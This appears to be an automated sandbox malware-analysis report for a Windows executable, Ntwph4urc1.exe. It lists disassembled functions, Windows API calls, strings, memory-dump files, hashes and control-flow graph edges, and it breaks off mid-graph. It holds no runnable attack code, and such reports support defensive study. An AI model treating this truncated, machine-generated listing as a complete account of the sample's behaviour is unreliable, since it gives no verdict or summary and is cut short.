                                            • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                            • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                            Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                            • CloseHandle.KERNEL32(?), ref: 00405A0D
                                            Strings
                                            • Error launching installer, xrefs: 004059EA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                            • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                            • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                            • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                            Function 00403A28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                            • GlobalFree.KERNEL32(00ADE088), ref: 00403A49
                                            Strings
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403A28
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 1100898210-2382934351
                                            • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                            • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                            • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                            • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                            Function 00405D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3976562730
                                            • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                            • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                            • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                            • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                            Function 743510E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7435116A
                                            • GlobalFree.KERNEL32(00000000), ref: 743511C7
                                            • GlobalFree.KERNEL32(00000000), ref: 743511D9
                                            • GlobalFree.KERNEL32(?), ref: 74351203
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 9030e1a79c45d3034007a1404d1307dbf7a0978e4fec8fcaa38fea32bd12e091
                                            • Instruction ID: ed6ecec174de9451745bb0ee8527958c838c4e83500a3ea460e9916b2e5e1b46
                                            • Opcode Fuzzy Hash: 9030e1a79c45d3034007a1404d1307dbf7a0978e4fec8fcaa38fea32bd12e091
                                            • Instruction Fuzzy Hash: 3E31A1B2E10201DBEB009F76D945E76F7FCEB48211725055AF84ED7229EB34EB018BA0
                                            Function 00405E49 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                            • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                            • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                            • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:100%
                                            Total number of Nodes:1
                                            Total number of Limit Nodes:0
                                            execution_graph 76597 36992df0 LdrInitializeThunk

                                            Executed Functions

                                            Function 369935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1 369935c0-369935cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0fae3e5718356fba40e59ca2b305b40299902773b0b8aef29414f5eb54a43413
                                            • Instruction ID: 534d9f4e7ff2298ceb7ad3d64e10430e35a3e33b0c437784fdd3d5578d35889d
                                            • Opcode Fuzzy Hash: 0fae3e5718356fba40e59ca2b305b40299902773b0b8aef29414f5eb54a43413
                                            • Instruction Fuzzy Hash: 15900271B0570402D10071988618706104A47D0211F65C452A143452CD87998A5565A2
                                            Function 36992DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 36992df0-36992dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5c16c082b20ad9d2a8081a2367420b298390df8119e17488d38a903209964be1
                                            • Instruction ID: 7b14f45d2e21497e2ea76dead1aa132b279e2e1daf760be0256bebd43e836fe1
                                            • Opcode Fuzzy Hash: 5c16c082b20ad9d2a8081a2367420b298390df8119e17488d38a903209964be1
                                            • Instruction Fuzzy Hash: 8390027170160413D11171988608707004E47D0251F95C453A143451CD965A8A56A121

                                            Non-executed Functions

                                            Function 36A0FCAB Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 95 36a0fcab-36a0fcc3 GetPEB 96 36a0fce2-36a0fce3 call 3694b970 95->96 97 36a0fcc5-36a0fce0 GetPEB call 3694b970 95->97 101 36a0fce8-36a0fd0a call 3694b970 96->101 97->101 104 36a0fd81-36a0fd8a GetPEB 101->104 105 36a0fd0c 101->105 122 36a0fda9-36a0fdaa call 3694b970 104->122 123 36a0fd8c-36a0fda7 GetPEB call 3694b970 104->123 106 36a0fd60-36a0fd65 105->106 107 36a0fd21-36a0fd26 105->107 108 36a0fd44-36a0fd49 105->108 109 36a0fd67-36a0fd6c 105->109 110 36a0fd28-36a0fd2d 105->110 111 36a0fd4b-36a0fd50 105->111 112 36a0fd6e-36a0fd73 105->112 113 36a0fd2f-36a0fd34 105->113 114 36a0fd52-36a0fd57 105->114 115 36a0fd13-36a0fd18 105->115 116 36a0fd75-36a0fd7a 105->116 117 36a0fd36-36a0fd3b 105->117 118 36a0fd59-36a0fd5e 105->118 119 36a0fd1a-36a0fd1f 105->119 120 36a0fd7c 105->120 121 36a0fd3d-36a0fd42 105->121 106->104 107->104 108->104 109->104 110->104 111->104 112->104 113->104 114->104 115->104 116->104 117->104 118->104 119->104 120->104 121->104 127 36a0fdaf-36a0fdca call 3694b970 122->127 123->127 130 36a0fdcc-36a0fdd5 GetPEB 127->130 131 36a0fe0d-36a0fe13 127->131 132 36a0fdf4-36a0fdf5 call 3694b970 130->132 133 36a0fdd7-36a0fdf2 GetPEB call 3694b970 130->133 134 36a0fe15-36a0fe1e GetPEB 131->134 135 36a0fe56-36a0fe5c 131->135 148 36a0fdfa-36a0fe0c call 3694b970 132->148 133->148 138 36a0fe20-36a0fe3b GetPEB call 3694b970 134->138 139 36a0fe3d-36a0fe3e call 3694b970 134->139 140 36a0fe5e-36a0fe67 GetPEB 135->140 141 36a0fe9f-36a0fea5 135->141 155 36a0fe43-36a0fe55 call 3694b970 138->155 139->155 146 36a0fe86-36a0fe87 call 3694b970 140->146 147 36a0fe69-36a0fe84 GetPEB call 3694b970 140->147 142 36a0fea7-36a0fead 141->142 143 36a0feaf-36a0feb8 GetPEB 141->143 142->143 150 36a0fef7-36a0ff00 GetPEB 142->150 151 36a0fed7-36a0fed8 call 3694b970 143->151 152 36a0feba-36a0fed5 GetPEB call 3694b970 143->152 165 36a0fe8c-36a0fe9e call 3694b970 146->165 147->165 148->131 163 36a0ff02-36a0ff1d GetPEB call 3694b970 150->163 164 36a0ff1f-36a0ff20 call 3694b970 150->164 167 36a0fedd-36a0fef4 call 3694b970 151->167 152->167 155->135 172 36a0ff25-36a0ff3a call 3694b970 163->172 164->172 165->141 167->150
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 666df6064273097d4ac9de032697107949f5519acc7122edb22043f04736e154
                                            • Instruction ID: c4891825ad3f0a7db58bb25aac7e3a9f213dd6fc18db4d50759eb22c0af988b1
                                            • Opcode Fuzzy Hash: 666df6064273097d4ac9de032697107949f5519acc7122edb22043f04736e154
                                            • Instruction Fuzzy Hash: F361C573815791EFE203FB99EC41D1173F4EB15B28B45405AEE01AF257CA3A9C82CE92
                                            Function 369F94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 553 369f94e0-369f9529 554 369f952b-369f9530 553->554 555 369f9578-369f9587 553->555 556 369f9534-369f953a 554->556 555->556 557 369f9589-369f958e 555->557 559 369f9695-369f96bd call 36999020 556->559 560 369f9540-369f9564 call 36999020 556->560 558 369f9d13-369f9d27 call 36994c30 557->558 569 369f96bf-369f96da call 369f9d2a 559->569 570 369f96dc-369f9712 559->570 567 369f9566-369f9573 call 36a1972b 560->567 568 369f9593-369f9634 GetPEB call 369fdc65 560->568 581 369f967d-369f9690 RtlDebugPrintTimes 567->581 579 369f9636-369f9644 568->579 580 369f9652-369f9667 568->580 573 369f9714-369f9716 569->573 570->573 573->558 577 369f971c-369f9731 RtlDebugPrintTimes 573->577 577->558 587 369f9737-369f973e 577->587 579->580 582 369f9646-369f964b 579->582 580->581 583 369f9669-369f966e 580->583 581->558 582->580 585 369f9673-369f9676 583->585 586 369f9670 583->586 585->581 586->585 587->558 589 369f9744-369f975f 587->589 590 369f9763-369f9774 call 369fa808 589->590 593 369f977a-369f977c 590->593 594 369f9d11 590->594 593->558 595 369f9782-369f9789 593->595 594->558 596 369f978f-369f9794 595->596 597 369f98fc-369f9902 595->597 600 369f97bc 596->600 601 369f9796-369f979c 596->601 598 369f9a9c-369f9aa2 597->598 599 369f9908-369f9937 call 36999020 597->599 605 369f9af4-369f9af9 598->605 606 369f9aa4-369f9aad 598->606 617 369f9939-369f9944 599->617 618 369f9970-369f9985 599->618 603 369f97c0-369f9811 call 36999020 RtlDebugPrintTimes 600->603 601->600 602 369f979e-369f97b2 601->602 607 369f97b8-369f97ba 602->607 608 369f97b4-369f97b6 602->608 603->558 642 369f9817-369f981b 603->642 612 369f9aff-369f9b07 605->612 613 369f9ba8-369f9bb1 605->613 606->590 611 369f9ab3-369f9aef call 36999020 606->611 607->603 608->603 638 369f9ce9 611->638 614 369f9b09-369f9b0d 612->614 615 369f9b13-369f9b3d call 369f8513 612->615 613->590 619 369f9bb7-369f9bba 613->619 614->613 614->615 639 369f9d08-369f9d0c 615->639 640 369f9b43-369f9b9e call 36999020 RtlDebugPrintTimes 615->640 622 369f994f-369f996e 617->622 623 369f9946-369f994d 617->623 627 369f9987-369f9989 618->627 628 369f9991-369f9998 618->628 624 369f9c7d-369f9cb4 call 36999020 619->624 625 369f9bc0-369f9c0a 619->625 637 369f99d9-369f99f6 RtlDebugPrintTimes 622->637 623->622 654 369f9cbb-369f9cc2 624->654 655 369f9cb6 624->655 635 369f9c0c 625->635 636 369f9c11-369f9c1e 625->636 629 369f998f 627->629 630 369f998b-369f998d 627->630 632 369f99bd-369f99bf 628->632 629->628 630->628 643 369f999a-369f99a4 632->643 644 369f99c1-369f99d7 632->644 635->636 645 369f9c2a-369f9c2d 636->645 646 369f9c20-369f9c23 636->646 637->558 660 369f99fc-369f9a1f call 36999020 637->660 647 369f9ced 638->647 639->590 640->558 685 369f9ba4 640->685 656 369f981d-369f9825 642->656 657 369f986b-369f9880 642->657 651 369f99ad 643->651 652 369f99a6 643->652 644->637 649 369f9c2f-369f9c32 645->649 650 369f9c39-369f9c7b 645->650 646->645 648 369f9cf1-369f9d06 RtlDebugPrintTimes 647->648 648->558 648->639 649->650 650->648 663 369f99af-369f99b1 651->663 652->644 661 369f99a8-369f99ab 652->661 664 369f9ccd 654->664 665 369f9cc4-369f9ccb 654->665 655->654 666 369f9827-369f9850 call 369f8513 656->666 667 369f9852-369f9869 656->667 659 369f9886-369f9894 657->659 668 369f9898-369f98ef call 36999020 RtlDebugPrintTimes 659->668 683 369f9a3d-369f9a58 660->683 684 369f9a21-369f9a3b 660->684 661->663 671 369f99bb 663->671 672 369f99b3-369f99b5 663->672 673 369f9cd1-369f9cd7 664->673 665->673 666->668 667->659 668->558 689 369f98f5-369f98f7 668->689 671->632 672->671 678 369f99b7-369f99b9 672->678 679 369f9cde-369f9ce4 673->679 680 369f9cd9-369f9cdc 673->680 678->632 679->647 686 369f9ce6 679->686 680->638 687 369f9a5d-369f9a8b RtlDebugPrintTimes 683->687 684->687 685->613 686->638 687->558 691 369f9a91-369f9a97 687->691 689->639 691->619
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $ $0
                                            • API String ID: 3446177414-3352262554
                                            • Opcode ID: 8f97792ff30477b77ebffb5997b82a0ff0dbee45ccf6cfe9e2e9f560797823be
                                            • Instruction ID: 1686bf654f9f1e760c0fadfe78b1285088f560abc8e92d52915501e5f1bf15fb
                                            • Opcode Fuzzy Hash: 8f97792ff30477b77ebffb5997b82a0ff0dbee45ccf6cfe9e2e9f560797823be
                                            • Instruction Fuzzy Hash: 683236B1A183418FE350CF69C884B4BBBE9BB88348F11492EF5998B350D776D949CB52
                                            Function 36A00274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1296 36a00274-36a00296 call 369a7e54 1299 36a002b5-36a002cd call 369476b2 1296->1299 1300 36a00298-36a002b0 RtlDebugPrintTimes 1296->1300 1305 36a002d3-36a002e9 1299->1305 1306 36a006f7 1299->1306 1304 36a00751-36a00760 1300->1304 1308 36a002f0-36a002f2 1305->1308 1309 36a002eb-36a002ee 1305->1309 1307 36a006fa-36a0074e call 36a00766 1306->1307 1307->1304 1310 36a002f3-36a0030a 1308->1310 1309->1310 1312 36a00310-36a00313 1310->1312 1313 36a006b1-36a006ba GetPEB 1310->1313 1312->1313 1315 36a00319-36a00322 1312->1315 1317 36a006d9-36a006de call 3694b970 1313->1317 1318 36a006bc-36a006d7 GetPEB call 3694b970 1313->1318 1319 36a00324-36a0033b call 3695ffb0 1315->1319 1320 36a0033e-36a00351 call 36a00cb5 1315->1320 1323 36a006e3-36a006f4 call 3694b970 1317->1323 1318->1323 1319->1320 1331 36a00353-36a0035a 1320->1331 1332 36a0035c-36a00370 call 3694758f 1320->1332 1323->1306 1331->1332 1335 36a005a2-36a005a7 1332->1335 1336 36a00376-36a00382 GetPEB 1332->1336 1335->1307 1337 36a005ad-36a005b9 GetPEB 1335->1337 1338 36a003f0-36a003fb 1336->1338 1339 36a00384-36a00387 1336->1339 1340 36a00627-36a00632 1337->1340 1341 36a005bb-36a005be 1337->1341 1342 36a00401-36a00408 1338->1342 1343 36a004e8-36a004fa call 369627f0 1338->1343 1344 36a003a6-36a003ab call 3694b970 1339->1344 1345 36a00389-36a003a4 GetPEB call 3694b970 1339->1345 1340->1307 1352 36a00638-36a00643 1340->1352 1347 36a005c0-36a005db GetPEB call 3694b970 1341->1347 1348 36a005dd-36a005e2 call 3694b970 1341->1348 1342->1343 1351 36a0040e-36a00417 1342->1351 1366 36a00590-36a0059d call 36a011a4 call 36a00cb5 1343->1366 1367 36a00500-36a00507 1343->1367 1355 